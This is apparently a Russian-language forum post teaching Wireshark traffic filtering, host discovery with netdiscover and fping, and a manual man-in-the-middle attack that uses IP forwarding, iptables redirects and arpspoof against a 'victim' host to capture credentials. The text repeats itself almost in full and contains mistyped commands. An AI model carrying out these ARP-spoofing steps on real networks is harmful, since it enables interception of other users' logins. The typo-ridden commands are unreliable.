- Автор темы
- #1
Анализируем трафик в WireShark.
Анализ информации внутри сети WI-Fi
Начнем по порядку.
Установка и запуск WireShark
WireShark - это известная утилита для анализа сетей. Для операционной системы Kali Linux она предоставлена в комплекте с набором основных программ. Есть версия для любителей Windows. Для установки на другие ОС Linux можно воспользоваться такой командой:
sudo atp-get install wireshar
После установки запустим утилиту. Можно запустить с помощью команды:
sudo wireshark
Интерфейс wireshark
Дальше необходимо выбрать один из предложенных интерфейсов и начать анализ трафика. После запуска интерфейс программы будет разделен на три блока.
Разделения интерфейса после запуска
Но так как в нашу утилиту попадают тонны трафика, то нужно использовать фильтры:
1. ip.proto - протокол
2. ip.src - отправитель
3. ip.dst - получатель
4. ip.addr - любой адрес
Фильтры поддерживают использование логических операторов и выражений:
== - присваивание
|| - логическое или
& - логическое и
> - больше
< - меньше
На примере можно использовать метод "GET". Введем в поле фильтра запрос "http.request.method == "GET". Находим запись и нажимаем правой кнопкой мыши Follow->TCP Stream. У меня получилось проанализировать пакет, в котором была загружена картинка на хост. Был получен формат, а также другая информация в USEr-Agent. Вот такими способами можно отсеивать не нужную информацию и искать полезные данные в WireShark. Таким способом можно получить авторизационные данные, а также полностью расшифровывать пакеты "telnet".
Пример перехваченного пакета
Сбор информации
Далее нам нужно получить информацию о пользователях. Для этого можно использовать две утилиты netdiscover и fping. Начнем с первой, чтобы быстро получить список активных участников сети можно воспользоваться Nmap или netdiscover, но последний способ быстрее.
sudo netdiscover
После этого получаем информацию об участниках сети.
Участники сети
Если у вас очень много участников в сети, то можно воспользоваться утилитой fping. Для того чтобы просканировать необходимо ввести команду. После этого активные хосты будут отображены в файле:
fping -Asg 192.168.1.0/24 -r 3 >> hosts_active.txt
Информация об участниках в файле
Эту информацию можно использовать в WireShark. Например, для фильтрации по конкретному IP, можно воспользоваться командой:
ip.addr==192.168.0.100
Фильтрация по IP
Или, например, фильтрация по MAC-адресу:
eth.addr==68:3e:xx:xx:xx:xx
Фильтрация по MAC-адресу
Можно комбинировать запросы логическим «или» - ||:
eth.addr==68:3e:xx:xx:xx:xx || igmp
Комбинирование двух разных запросов
MITM-атака
Это, по сути, процесс, когда вы располагаетесь между роутером и пользователем сети и начинаете слушать все пакеты. Принцип действий хорошо показан на картинке:
MITM-атака
Для этих задач есть специальные утилиты, но можно сделать все и ручками. Для этого необходимо сначала включить IP-форвординг и изменить правила iptablex:
sudo cat /proc/sys/net/ipv4/ip_forward #Проверка форвординга пакетов, если -включен, если 0-выключен.
echo "1" > /proc/sys/net/ipv4/ip_forward #Включаем форвординг пакетов
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 80 порта на 8282
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 443 порта на 8282
Далее необходимо запустить команду. Перед этим обязательно запустить WireShark для снифа трафика, чтобы потом его можно было проанализировать:
arpfpoof -i <interface> -t <жертва> <шлюз>
Например, если вы проводите эту атаку в сети и IP нашей цели 192.168.0.100, то команда будет иметь такой вид:
arpspoof -i wlp3s0 -t 192.168.0.100 192.168.0.1
Далее с фильтрами и другими данными информация анализируется в WireShark.
Анализ информации внутри сети WI-Fi
Начнем по порядку.
Установка и запуск WireShark
WireShark - это известная утилита для анализа сетей. Для операционной системы Kali Linux она предоставлена в комплекте с набором основных программ. Есть версия для любителей Windows. Для установки на другие ОС Linux можно воспользоваться такой командой:
sudo atp-get install wireshar
После установки запустим утилиту. Можно запустить с помощью команды:
sudo wireshark
Интерфейс wireshark
Дальше необходимо выбрать один из предложенных интерфейсов и начать анализ трафика. После запуска интерфейс программы будет разделен на три блока.
Разделения интерфейса после запуска
- блок - настройка и управления утилитой.
- блок - пакеты, которые были перехвачены.
- блок - информация для расшифровки и получения данных с пакетов.
Но так как в нашу утилиту попадают тонны трафика, то нужно использовать фильтры:
1. ip.proto - протокол
2. ip.src - отправитель
3. ip.dst - получатель
4. ip.addr - любой адрес
Фильтры поддерживают использование логических операторов и выражений:
== - присваивание
|| - логическое или
& - логическое и
> - больше
< - меньше
На примере можно использовать метод "GET". Введем в поле фильтра запрос "http.request.method == "GET". Находим запись и нажимаем правой кнопкой мыши Follow->TCP Stream. У меня получилось проанализировать пакет, в котором была загружена картинка на хост. Был получен формат, а также другая информация в USEr-Agent. Вот такими способами можно отсеивать не нужную информацию и искать полезные данные в WireShark. Таким способом можно получить авторизационные данные, а также полностью расшифровывать пакеты "telnet".
Пример перехваченного пакета
Сбор информации
Далее нам нужно получить информацию о пользователях. Для этого можно использовать две утилиты netdiscover и fping. Начнем с первой, чтобы быстро получить список активных участников сети можно воспользоваться Nmap или netdiscover, но последний способ быстрее.
sudo netdiscover
После этого получаем информацию об участниках сети.
Участники сети
Если у вас очень много участников в сети, то можно воспользоваться утилитой fping. Для того чтобы просканировать необходимо ввести команду. После этого активные хосты будут отображены в файле:
fping -Asg 192.168.1.0/24 -r 3 >> hosts_active.txt
Информация об участниках в файле
Эту информацию можно использовать в WireShark. Например, для фильтрации по конкретному IP, можно воспользоваться командой:
ip.addr==192.168.0.100
Фильтрация по IP
Или, например, фильтрация по MAC-адресу:
eth.addr==68:3e:xx:xx:xx:xx
Фильтрация по MAC-адресу
Можно комбинировать запросы логическим «или» - ||:
eth.addr==68:3e:xx:xx:xx:xx || igmp
Комбинирование двух разных запросов
MITM-атака
Это, по сути, процесс, когда вы располагаетесь между роутером и пользователем сети и начинаете слушать все пакеты. Принцип действий хорошо показан на картинке:
MITM-атака
Для этих задач есть специальные утилиты, но можно сделать все и ручками. Для этого необходимо сначала включить IP-форвординг и изменить правила iptablex:
sudo cat /proc/sys/net/ipv4/ip_forward #Проверка форвординга пакетов, если -включен, если 0-выключен.
echo "1" > /proc/sys/net/ipv4/ip_forward #Включаем форвординг пакетов
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 80 порта на 8282
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 443 порта на 8282
Далее необходимо запустить команду. Перед этим обязательно запустить WireShark для снифа трафика, чтобы потом его можно было проанализировать:
arpfpoof -i <interface> -t <жертва> <шлюз>
Например, если вы проводите эту атаку в сети и IP нашей цели 192.168.0.100, то команда будет иметь такой вид:
arpspoof -i wlp3s0 -t 192.168.0.100 192.168.0.1
Далее с фильтрами и другими данными информация анализируется в WireShark.